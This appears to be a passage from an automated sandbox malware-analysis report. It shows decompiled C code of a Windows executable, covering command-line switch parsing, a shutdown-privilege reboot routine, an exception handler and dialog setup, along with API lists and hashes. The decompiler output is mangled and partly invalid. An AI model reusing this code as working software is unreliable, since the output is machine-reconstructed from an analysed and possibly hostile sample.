                                                				signed int _t221;
                                                				signed int _t223;
                                                
                                                				_t173 = __ecx;
                                                				_t61 =  *0x1068004; // 0x19e58fb5
                                                				_v8 = _t61 ^ _t221;
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_push(__edi);
                                                				_t209 = 1;
                                                				if(__ecx == 0 ||  *__ecx == 0) {
                                                					_t63 = 1;
                                                				} else {
                                                					L2:
                                                					while(_t209 != 0) {
                                                						_t67 =  *_t173;
                                                						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                							_t173 = CharNextA(_t173);
                                                							continue;
                                                						}
                                                						_v272 = _t173;
                                                						if(_t67 == 0) {
                                                							break;
                                                						} else {
                                                							_t69 = _v272;
                                                							_t177 = 0;
                                                							_t213 = 0;
                                                							_t163 = 0;
                                                							_t202 = 1;
                                                							do {
                                                								if(_t213 != 0) {
                                                									if(_t163 != 0) {
                                                										break;
                                                									} else {
                                                										goto L21;
                                                									}
                                                								} else {
                                                									_t69 =  *_t69;
                                                									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                										break;
                                                									} else {
                                                										_t69 = _v272;
                                                										L21:
                                                										_t155 =  *_t69;
                                                										if(_t155 != 0x22) {
                                                											if(_t202 >= 0x104) {
                                                												goto L106;
                                                											} else {
                                                												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                												_t177 = _t177 + 1;
                                                												_t202 = _t202 + 1;
                                                												_t157 = 1;
                                                												goto L30;
                                                											}
                                                										} else {
                                                											if(_v272[1] == 0x22) {
                                                												if(_t202 >= 0x104) {
                                                													L106:
                                                													_t63 = 0;
                                                													L125:
                                                													_pop(_t210);
                                                													_pop(_t212);
                                                													_pop(_t162);
                                                													return E01066CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                												} else {
                                                													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                													_t177 = _t177 + 1;
                                                													_t202 = _t202 + 1;
                                                													_t157 = 2;
                                                													goto L30;
                                                												}
                                                											} else {
                                                												_t157 = 1;
                                                												if(_t213 != 0) {
                                                													_t163 = 1;
                                                												} else {
                                                													_t213 = 1;
                                                												}
                                                												goto L30;
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L131;
                                                								L30:
                                                								_v272 =  &(_v272[_t157]);
                                                								_t69 = _v272;
                                                							} while ( *_t69 != 0);
                                                							if(_t177 >= 0x104) {
                                                								E01066E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                								asm("int3");
                                                								_push(_t221);
                                                								_t222 = _t223;
                                                								_t71 =  *0x1068004; // 0x19e58fb5
                                                								_v296 = _t71 ^ _t223;
                                                								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                									0x4f0 = 2;
                                                									_t75 = E0106597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                								} else {
                                                									E010644B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                									 *0x1069124 = E01066285();
                                                									_t75 = 0;
                                                								}
                                                								return E01066CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                							} else {
                                                								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                								if(_t213 == 0) {
                                                									if(_t163 != 0) {
                                                										goto L34;
                                                									} else {
                                                										goto L40;
                                                									}
                                                								} else {
                                                									if(_t163 != 0) {
                                                										L40:
                                                										_t79 = _v268;
                                                										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                											_t83 = CharUpperA(_v267) - 0x3f;
                                                											if(_t83 == 0) {
                                                												_t202 = 0x521;
                                                												E010644B9(0, 0x521, 0x1061140, 0, 0x40, 0);
                                                												_t85 =  *0x1068588; // 0x0
                                                												if(_t85 != 0) {
                                                													CloseHandle(_t85);
                                                												}
                                                												ExitProcess(0);
                                                											}
                                                											_t87 = _t83 - 4;
                                                											if(_t87 == 0) {
                                                												if(_v266 != 0) {
                                                													if(_v266 != 0x3a) {
                                                														goto L49;
                                                													} else {
                                                														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                														_t215 =  &_v268 + _t167;
                                                														_t183 =  &_v268 + _t167;
                                                														_t50 = _t183 + 1; // 0x1
                                                														_t202 = _t50;
                                                														do {
                                                															_t88 =  *_t183;
                                                															_t183 = _t183 + 1;
                                                														} while (_t88 != 0);
                                                														if(_t183 == _t202) {
                                                															goto L49;
                                                														} else {
                                                															_t205 = 0x5b;
                                                															if(E0106667F(_t215, _t205) == 0) {
                                                																L115:
                                                																_t206 = 0x5d;
                                                																if(E0106667F(_t215, _t206) == 0) {
                                                																	L117:
                                                																	_t202 =  &_v276;
                                                																	_v276 = _t167;
                                                																	if(E01065C17(_t215,  &_v276) == 0) {
                                                																		goto L49;
                                                																	} else {
                                                																		_t202 = 0x104;
                                                																		E01061680(0x1068c42, 0x104, _v276 + _t167 +  &_v268);
                                                																	}
                                                																} else {
                                                																	_t202 = 0x5b;
                                                																	if(E0106667F(_t215, _t202) == 0) {
                                                																		goto L49;
                                                																	} else {
                                                																		goto L117;
                                                																	}
                                                																}
                                                															} else {
                                                																_t202 = 0x5d;
                                                																if(E0106667F(_t215, _t202) == 0) {
                                                																	goto L49;
                                                																} else {
                                                																	goto L115;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												} else {
                                                													 *0x1068a24 = 1;
                                                												}
                                                												goto L50;
                                                											} else {
                                                												_t100 = _t87 - 1;
                                                												if(_t100 == 0) {
                                                													L98:
                                                													if(_v266 != 0x3a) {
                                                														goto L49;
                                                													} else {
                                                														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                														_t217 =  &_v268 + _t170;
                                                														_t192 =  &_v268 + _t170;
                                                														_t38 = _t192 + 1; // 0x1
                                                														_t202 = _t38;
                                                														do {
                                                															_t101 =  *_t192;
                                                															_t192 = _t192 + 1;
                                                														} while (_t101 != 0);
                                                														if(_t192 == _t202) {
                                                															goto L49;
                                                														} else {
                                                															_t202 =  &_v276;
                                                															_v276 = _t170;
                                                															if(E01065C17(_t217,  &_v276) == 0) {
                                                																goto L49;
                                                															} else {
                                                																_t104 = CharUpperA(_v267);
                                                																_t218 = 0x1068b3e;
                                                																_t105 = _v276;
                                                																if(_t104 != 0x54) {
                                                																	_t218 = 0x1068a3a;
                                                																}
                                                																E01061680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                																_t202 = 0x104;
                                                																E0106658A(_t218, 0x104, 0x1061140);
                                                																if(E010631E0(_t218) != 0) {
                                                																	goto L50;
                                                																} else {
                                                																	goto L106;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												} else {
                                                													_t111 = _t100 - 0xa;
                                                													if(_t111 == 0) {
                                                														if(_v266 != 0) {
                                                															if(_v266 != 0x3a) {
                                                																goto L49;
                                                															} else {
                                                																_t199 = _v265;
                                                																if(_t199 != 0) {
                                                																	_t219 =  &_v265;
                                                																	do {
                                                																		_t219 = _t219 + 1;
                                                																		_t115 = CharUpperA(_t199) - 0x45;
                                                																		if(_t115 == 0) {
                                                																			 *0x1068a2c = 1;
                                                																		} else {
                                                																			_t200 = 2;
                                                																			_t119 = _t115 - _t200;
                                                																			if(_t119 == 0) {
                                                																				 *0x1068a30 = 1;
                                                																			} else {
                                                																				if(_t119 == 0xf) {
                                                																					 *0x1068a34 = 1;
                                                																				} else {
                                                																					_t209 = 0;
                                                																				}
                                                																			}
                                                																		}
                                                																		_t118 =  *_t219;
                                                																		_t199 = _t118;
                                                																	} while (_t118 != 0);
                                                																}
                                                															}
                                                														} else {
                                                															 *0x1068a2c = 1;
                                                														}
                                                														goto L50;
                                                													} else {
                                                														_t127 = _t111 - 3;
                                                														if(_t127 == 0) {
                                                															if(_v266 != 0) {
                                                																if(_v266 != 0x3a) {
                                                																	goto L49;
                                                																} else {
                                                																	_t129 = CharUpperA(_v265);
                                                																	if(_t129 == 0x31) {
                                                																		goto L76;
                                                																	} else {
                                                																		if(_t129 == 0x41) {
                                                																			goto L83;
                                                																		} else {
                                                																			if(_t129 == 0x55) {
                                                																				goto L76;
                                                																			} else {
                                                																				goto L49;
                                                																			}
                                                																		}
                                                																	}
                                                																}
                                                															} else {
                                                																L76:
                                                																_push(2);
                                                																_pop(1);
                                                																L83:
                                                																 *0x1068a38 = 1;
                                                															}
                                                															goto L50;
                                                														} else {
                                                															_t132 = _t127 - 1;
                                                															if(_t132 == 0) {
                                                																if(_v266 != 0) {
                                                																	if(_v266 != 0x3a) {
                                                																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                																			goto L49;
                                                																		}
                                                																	} else {
                                                																		_t201 = _v265;
                                                																		 *0x1069a2c = 1;
                                                																		if(_t201 != 0) {
                                                																			_t220 =  &_v265;
                                                																			do {
                                                																				_t220 = _t220 + 1;
                                                																				_t142 = CharUpperA(_t201) - 0x41;
                                                																				if(_t142 == 0) {
                                                																					_t143 = 2;
                                                																					 *0x1069a2c =  *0x1069a2c | _t143;
                                                																					goto L70;
                                                																				} else {
                                                																					_t145 = _t142 - 3;
                                                																					if(_t145 == 0) {
                                                																						 *0x1068d48 =  *0x1068d48 | 0x00000040;
                                                																					} else {
                                                																						_t146 = _t145 - 5;
                                                																						if(_t146 == 0) {
                                                																							 *0x1069a2c =  *0x1069a2c & 0xfffffffd;
                                                																							goto L70;
                                                																						} else {
                                                																							_t147 = _t146 - 5;
                                                																							if(_t147 == 0) {
                                                																								 *0x1069a2c =  *0x1069a2c & 0xfffffffe;
                                                																								goto L70;
                                                																							} else {
                                                																								_t149 = _t147;
                                                																								if(_t149 == 0) {
                                                																									 *0x1068d48 =  *0x1068d48 | 0x00000080;
                                                																								} else {
                                                																									if(_t149 == 3) {
                                                																										 *0x1069a2c =  *0x1069a2c | 0x00000004;
                                                																										L70:
                                                																										 *0x1068a28 = 1;
                                                																									} else {
                                                																										_t209 = 0;
                                                																									}
                                                																								}
                                                																							}
                                                																						}
                                                																					}
                                                																				}
                                                																				_t144 =  *_t220;
                                                																				_t201 = _t144;
                                                																			} while (_t144 != 0);
                                                																		}
                                                																	}
                                                																} else {
                                                																	 *0x1069a2c = 3;
                                                																	 *0x1068a28 = 1;
                                                																}
                                                																goto L50;
                                                															} else {
                                                																if(_t132 == 0) {
                                                																	goto L98;
                                                																} else {
                                                																	L49:
                                                																	_t209 = 0;
                                                																	L50:
                                                																	_t173 = _v272;
                                                																	if( *_t173 != 0) {
                                                																		goto L2;
                                                																	} else {
                                                																		break;
                                                																	}
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										} else {
                                                											goto L106;
                                                										}
                                                									} else {
                                                										L34:
                                                										_t209 = 0;
                                                										break;
                                                									}
                                                								}
                                                							}
                                                						}
                                                						goto L131;
                                                					}
                                                					if( *0x1068a2c != 0 &&  *0x1068b3e == 0) {
                                                						if(GetModuleFileNameA( *0x1069a3c, 0x1068b3e, 0x104) == 0) {
                                                							_t209 = 0;
                                                						} else {
                                                							_t202 = 0x5c;
                                                							 *((char*)(E010666C8(0x1068b3e, _t202) + 1)) = 0;
                                                						}
                                                					}
                                                					_t63 = _t209;
                                                				}
                                                				L131:
                                                			}


































































                                                0x01065c9e
                                                0x01065ca9
                                                0x01065cb0
                                                0x01065cb3
                                                0x01065cb6
                                                0x01065cb7
                                                0x01065cb8
                                                0x01065cbd
                                                0x01066204
                                                0x01065ccb
                                                0x00000000
                                                0x01065ccb
                                                0x01065cd3
                                                0x01065cd7
                                                0x01065cf4
                                                0x00000000
                                                0x01065cf4
                                                0x01065cf8
                                                0x01065d00
                                                0x00000000
                                                0x01065d06
                                                0x01065d06
                                                0x01065d0e
                                                0x01065d10
                                                0x01065d12
                                                0x01065d14
                                                0x01065d15
                                                0x01065d17
                                                0x01065d49
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01065d19
                                                0x01065d19
                                                0x01065d1d
                                                0x00000000
                                                0x01065d3f
                                                0x01065d3f
                                                0x01065d4b
                                                0x01065d4b
                                                0x01065d4f
                                                0x01065d8d
                                                0x00000000
                                                0x01065d93
                                                0x01065d93
                                                0x01065d9a
                                                0x01065d9d
                                                0x01065d9e
                                                0x00000000
                                                0x01065d9e
                                                0x01065d51
                                                0x01065d5b
                                                0x01065d72
                                                0x010660fb
                                                0x010660fb
                                                0x01066207
                                                0x0106620a
                                                0x0106620b
                                                0x0106620e
                                                0x01066217
                                                0x01065d78
                                                0x01065d78
                                                0x01065d80
                                                0x01065d83
                                                0x01065d84
                                                0x00000000
                                                0x01065d84
                                                0x01065d5d
                                                0x01065d5f
                                                0x01065d62
                                                0x01065d68
                                                0x01065d64
                                                0x01065d64
                                                0x01065d64
                                                0x00000000
                                                0x01065d62
                                                0x01065d5b
                                                0x01065d4f
                                                0x01065d1d
                                                0x00000000
                                                0x01065d9f
                                                0x01065d9f
                                                0x01065da5
                                                0x01065dab
                                                0x01065dba
                                                0x01066218
                                                0x0106621d
                                                0x01066220
                                                0x01066221
                                                0x01066229
                                                0x01066230
                                                0x01066247
                                                0x0106626a
                                                0x01066272
                                                0x01066249
                                                0x01066255
                                                0x0106625f
                                                0x01066264
                                                0x01066264
                                                0x01066284
                                                0x01065dc0
                                                0x01065dc0
                                                0x01065dca
                                                0x01065e22
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01065dcc
                                                0x01065dce
                                                0x01065e24
                                                0x01065e24
                                                0x01065e2c
                                                0x01065e47
                                                0x01065e4a
                                                0x010661d2
                                                0x010661e2
                                                0x010661e7
                                                0x010661ee
                                                0x010661f1
                                                0x010661f1
                                                0x010661f8
                                                0x010661f8
                                                0x01065e50
                                                0x01065e53
                                                0x01066109
                                                0x0106611f
                                                0x00000000
                                                0x01066125
                                                0x01066137
                                                0x0106613a
                                                0x0106613c
                                                0x0106613e
                                                0x0106613e
                                                0x01066141
                                                0x01066141
                                                0x01066143
                                                0x01066144
                                                0x0106614a
                                                0x00000000
                                                0x01066150
                                                0x01066152
                                                0x0106615c
                                                0x01066170
                                                0x01066172
                                                0x0106617c
                                                0x01066190
                                                0x01066190
                                                0x01066196
                                                0x010661a5
                                                0x00000000
                                                0x010661ab
                                                0x010661b9
                                                0x010661c6
                                                0x010661c6
                                                0x0106617e
                                                0x01066180
                                                0x0106618a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0106618a
                                                0x0106615e
                                                0x01066160
                                                0x0106616a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0106616a
                                                0x0106615c
                                                0x0106614a
                                                0x0106610b
                                                0x0106610e
                                                0x0106610e
                                                0x00000000
                                                0x01065e59
                                                0x01065e59
                                                0x01065e5c
                                                0x0106604f
                                                0x01066056
                                                0x00000000
                                                0x0106605c
                                                0x0106606e
                                                0x01066071
                                                0x01066073
                                                0x01066075
                                                0x01066075
                                                0x01066078
                                                0x01066078
                                                0x0106607a
                                                0x0106607b
                                                0x01066081
                                                0x00000000
                                                0x01066087
                                                0x01066087
                                                0x0106608d
                                                0x0106609c
                                                0x00000000
                                                0x010660a2
                                                0x010660aa
                                                0x010660b2
                                                0x010660b7
                                                0x010660bd
                                                0x010660bf
                                                0x010660bf
                                                0x010660d6
                                                0x010660e0
                                                0x010660e7
                                                0x010660f5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x010660f5
                                                0x0106609c
                                                0x01066081
                                                0x01065e62
                                                0x01065e62
                                                0x01065e65
                                                0x01065fd3
                                                0x01065fe9
                                                0x00000000
                                                0x01065fef
                                                0x01065fef
                                                0x01065ff7
                                                0x01065ffd
                                                0x01066003
                                                0x01066006
                                                0x01066011
                                                0x01066014
                                                0x0106603d
                                                0x01066016
                                                0x01066018
                                                0x01066019
                                                0x0106601b
                                                0x01066033
                                                0x0106601d
                                                0x01066020
                                                0x01066029
                                                0x01066022
                                                0x01066022
                                                0x01066022
                                                0x01066020
                                                0x0106601b
                                                0x01066042
                                                0x01066044
                                                0x01066046
                                                0x0106604a
                                                0x01065ff7
                                                0x01065fd5
                                                0x01065fd8
                                                0x01065fd8
                                                0x00000000
                                                0x01065e6b
                                                0x01065e6b
                                                0x01065e6e
                                                0x01065f8b
                                                0x01065f99
                                                0x00000000
                                                0x01065f9f
                                                0x01065fa7
                                                0x01065faf
                                                0x00000000
                                                0x01065fb1
                                                0x01065fb3
                                                0x00000000
                                                0x01065fb5
                                                0x01065fb7
                                                0x00000000
                                                0x01065fb9
                                                0x00000000
                                                0x01065fb9
                                                0x01065fb7
                                                0x01065fb3
                                                0x01065faf
                                                0x01065f8d
                                                0x01065f8d
                                                0x01065f8d
                                                0x01065f8f
                                                0x01065fc1
                                                0x01065fc1
                                                0x01065fc1
                                                0x00000000
                                                0x01065e74
                                                0x01065e74
                                                0x01065e77
                                                0x01065ea0
                                                0x01065ebd
                                                0x01065f79
                                                0x00000000
                                                0x01065f7f
                                                0x01065ec3
                                                0x01065ec3
                                                0x01065ecc
                                                0x01065ed4
                                                0x01065ed6
                                                0x01065edc
                                                0x01065edf
                                                0x01065eea
                                                0x01065eed
                                                0x01065f3f
                                                0x01065f40
                                                0x00000000
                                                0x01065eef
                                                0x01065eef
                                                0x01065ef2
                                                0x01065f34
                                                0x01065ef4
                                                0x01065ef4
                                                0x01065ef7
                                                0x01065f2b
                                                0x00000000
                                                0x01065ef9
                                                0x01065ef9
                                                0x01065efc
                                                0x01065f22
                                                0x00000000
                                                0x01065efe
                                                0x01065eff
                                                0x01065f02
                                                0x01065f16
                                                0x01065f04
                                                0x01065f07
                                                0x01065f0d
                                                0x01065f46
                                                0x01065f46
                                                0x01065f09
                                                0x01065f09
                                                0x01065f09
                                                0x01065f07
                                                0x01065f02
                                                0x01065efc
                                                0x01065ef7
                                                0x01065ef2
                                                0x01065f4c
                                                0x01065f4e
                                                0x01065f50
                                                0x01065f54
                                                0x01065ed4
                                                0x01065ea2
                                                0x01065ea4
                                                0x01065eaf
                                                0x01065eaf
                                                0x00000000
                                                0x01065e79
                                                0x01065e7d
                                                0x00000000
                                                0x01065e83
                                                0x01065e83
                                                0x01065e83
                                                0x01065e85
                                                0x01065e85
                                                0x01065e8e
                                                0x00000000
                                                0x01065e94
                                                0x00000000
                                                0x01065e94
                                                0x01065e8e
                                                0x01065e7d
                                                0x01065e77
                                                0x01065e6e
                                                0x01065e65
                                                0x01065e5c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01065dd0
                                                0x01065dd0
                                                0x01065dd0
                                                0x00000000
                                                0x01065dd0
                                                0x01065dce
                                                0x01065dca
                                                0x01065dba
                                                0x00000000
                                                0x01065d00
                                                0x01065dd9
                                                0x01065e04
                                                0x010661fe
                                                0x01065e0a
                                                0x01065e0c
                                                0x01065e17
                                                0x01065e17
                                                0x01065e04
                                                0x01066200
                                                0x01066200
                                                0x00000000

                                                APIs
                                                • CharNextA.USER32(?,00000000,?,?), ref: 01065CEE
                                                • GetModuleFileNameA.KERNEL32(01068B3E,00000104,00000000,?,?), ref: 01065DFC
                                                • CharUpperA.USER32(?), ref: 01065E3E
                                                • CharUpperA.USER32(-00000052), ref: 01065EE1
                                                • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 01065F6F
                                                • CharUpperA.USER32(?), ref: 01065FA7
                                                • CharUpperA.USER32(-0000004E), ref: 01066008
                                                • CharUpperA.USER32(?), ref: 010660AA
                                                • CloseHandle.KERNEL32(00000000,01061140,00000000,00000040,00000000), ref: 010661F1
                                                • ExitProcess.KERNEL32 ref: 010661F8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                • String ID: "$"$:$RegServer
                                                • API String ID: 1203814774-25366791
                                                • Opcode ID: a60659ee017b725ef8df305db30a3950816b0611e6ea704523cc57ae349e4b31
                                                • Instruction ID: e4424071145027ce038ab8984598dd909fcab328d91f90919ec6bff090c30e84
                                                • Opcode Fuzzy Hash: a60659ee017b725ef8df305db30a3950816b0611e6ea704523cc57ae349e4b31
                                                • Instruction Fuzzy Hash: 47D16B71A042459FFF759B3C8C483FE3FEDAB16384F0881EAD5C6D6195D6768A828B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E01061F90(signed int __ecx, void* __edi, void* __esi) {
                                                				signed int _v8;
                                                				int _v12;
                                                				struct _TOKEN_PRIVILEGES _v24;
                                                				void* _v28;
                                                				void* __ebx;
                                                				signed int _t13;
                                                				int _t21;
                                                				void* _t25;
                                                				int _t28;
                                                				signed char _t30;
                                                				void* _t38;
                                                				void* _t40;
                                                				void* _t41;
                                                				signed int _t46;
                                                
                                                				_t41 = __esi;
                                                				_t38 = __edi;
                                                				_t30 = __ecx;
                                                				if((__ecx & 0x00000002) != 0) {
                                                					L12:
                                                					if((_t30 & 0x00000004) != 0) {
                                                						L14:
                                                						if( *0x1069a40 != 0) {
                                                							_pop(_t30);
                                                							_t44 = _t46;
                                                							_t13 =  *0x1068004; // 0x19e58fb5
                                                							_v8 = _t13 ^ _t46;
                                                							_push(_t38);
                                                							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                								_v24.PrivilegeCount = 1;
                                                								_v12 = 2;
                                                								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                								CloseHandle(_v28);
                                                								_t41 = _t41;
                                                								_push(0);
                                                								if(_t21 != 0) {
                                                									if(ExitWindowsEx(2, ??) != 0) {
                                                										_t25 = 1;
                                                									} else {
                                                										_t37 = 0x4f7;
                                                										goto L3;
                                                									}
                                                								} else {
                                                									_t37 = 0x4f6;
                                                									goto L4;
                                                								}
                                                							} else {
                                                								_t37 = 0x4f5;
                                                								L3:
                                                								_push(0);
                                                								L4:
                                                								_push(0x10);
                                                								_push(0);
                                                								_push(0);
                                                								E010644B9(0, _t37);
                                                								_t25 = 0;
                                                							}
                                                							_pop(_t40);
                                                							return E01066CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                						} else {
                                                							_t28 = ExitWindowsEx(2, 0);
                                                							goto L16;
                                                						}
                                                					} else {
                                                						_t37 = 0x522;
                                                						_t28 = E010644B9(0, 0x522, 0x1061140, 0, 0x40, 4);
                                                						if(_t28 != 6) {
                                                							goto L16;
                                                						} else {
                                                							goto L14;
                                                						}
                                                					}
                                                				} else {
                                                					__eax = E01061EA7(__ecx);
                                                					if(__eax != 2) {
                                                						L16:
                                                						return _t28;
                                                					} else {
                                                						goto L12;
                                                					}
                                                				}
                                                			}

















                                                0x01061f90
                                                0x01061f90
                                                0x01061f93
                                                0x01061f98
                                                0x01061fa4
                                                0x01061fa7
                                                0x01061fc5
                                                0x01061fcd
                                                0x01061fdb
                                                0x01061ee5
                                                0x01061eea
                                                0x01061ef1
                                                0x01061ef4
                                                0x01061f0c
                                                0x01061f2e
                                                0x01061f3a
                                                0x01061f46
                                                0x01061f4d
                                                0x01061f58
                                                0x01061f60
                                                0x01061f61
                                                0x01061f62
                                                0x01061f75
                                                0x01061f80
                                                0x01061f77
                                                0x01061f77
                                                0x00000000
                                                0x01061f77
                                                0x01061f64
                                                0x01061f64
                                                0x00000000
                                                0x01061f64
                                                0x01061f0e
                                                0x01061f0e
                                                0x01061f13
                                                0x01061f13
                                                0x01061f14
                                                0x01061f14
                                                0x01061f16
                                                0x01061f17
                                                0x01061f1a
                                                0x01061f1f
                                                0x01061f1f
                                                0x01061f86
                                                0x01061f8f
                                                0x01061fcf
                                                0x01061fd3
                                                0x00000000
                                                0x01061fd3
                                                0x01061fa9
                                                0x01061fb4
                                                0x01061fbb
                                                0x01061fc3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01061fc3
                                                0x01061f9a
                                                0x01061f9a
                                                0x01061fa2
                                                0x01061fd9
                                                0x01061fda
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01061fa2

                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 01061EFB
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 01061F02
                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 01061FD3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitOpenTokenWindows
                                                • String ID: SeShutdownPrivilege
                                                • API String ID: 2795981589-3733053543
                                                • Opcode ID: a5510c97740e25a64e7bed892edab2357f3641815d6886c7843f7d865b79f6fc
                                                • Instruction ID: 120f43f73af9a25c982257584600e56a4d03c97857b0296cd701e13d586d0a4a
                                                • Opcode Fuzzy Hash: a5510c97740e25a64e7bed892edab2357f3641815d6886c7843f7d865b79f6fc
                                                • Instruction Fuzzy Hash: DA21E571B40205FBEB30ABA59C4AFBF76FCEBD5B50F100019FA82E6185DB7A84018361
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E01066CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                
                                                				SetUnhandledExceptionFilter(0);
                                                				UnhandledExceptionFilter(_a4);
                                                				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                			}



                                                0x01066cf7
                                                0x01066d00
                                                0x01066d19

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,01066E26,01061000), ref: 01066CF7
                                                • UnhandledExceptionFilter.KERNEL32(01066E26,?,01066E26,01061000), ref: 01066D00
                                                • GetCurrentProcess.KERNEL32(C0000409,?,01066E26,01061000), ref: 01066D0B
                                                • TerminateProcess.KERNEL32(00000000,?,01066E26,01061000), ref: 01066D12
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.387093394.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                                                • Associated: 00000001.00000002.387064424.0000000001060000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387162603.0000000001068000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.387173888.000000000106C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_1060000_will6283.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                • String ID:
                                                • API String ID: 3231755760-0
                                                • Opcode ID: 6d833ce3873059986ce681b7c21b30bea777241fb658f4eb8e728b129df6720d
                                                • Instruction ID: 1576bf11cf3a02100cb3b2908629c0b15fa49bc99e7f2f9e07630f704d4644eb
                                                • Opcode Fuzzy Hash: 6d833ce3873059986ce681b7c21b30bea777241fb658f4eb8e728b129df6720d
                                                • Instruction Fuzzy Hash: ACD01232200108FBDB203BF1E80CA593F28FB48392F444000F35DAB024CB3B9451CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 76%
                                                			E01063210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                				void* __edi;
                                                				void* _t6;
                                                				void* _t10;
                                                				int _t20;
                                                				int _t21;
                                                				int _t23;
                                                				char _t24;
                                                				long _t25;
                                                				int _t27;
                                                				int _t30;
                                                				void* _t32;
                                                				int _t33;
                                                				int _t34;
                                                				int _t37;
                                                				int _t38;
                                                				int _t39;
                                                				void* _t42;
                                                				void* _t46;
                                                				CHAR* _t49;
                                                				void* _t58;
                                                				void* _t63;
                                                				struct HWND__* _t64;
                                                
                                                				_t64 = _a4;
                                                				_t6 = _a8 - 0x10;
                                                				if(_t6 == 0) {
                                                					_push(0);
                                                					L38:
                                                					EndDialog(_t64, ??);
                                                					L39:
                                                					__eflags = 1;
                                                					return 1;
                                                				}
                                                				_t42 = 1;
                                                				_t10 = _t6 - 0x100;
                                                				if(_t10 == 0) {
                                                					E010643D0(_t64, GetDesktopWindow());
                                                					SetWindowTextA(_t64, "lega");
                                                					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                					__eflags =  *0x1069a40 - _t42; // 0x3
                                                					if(__eflags == 0) {
                                                						EnableWindow(GetDlgItem(_t64, 0x836), 0);
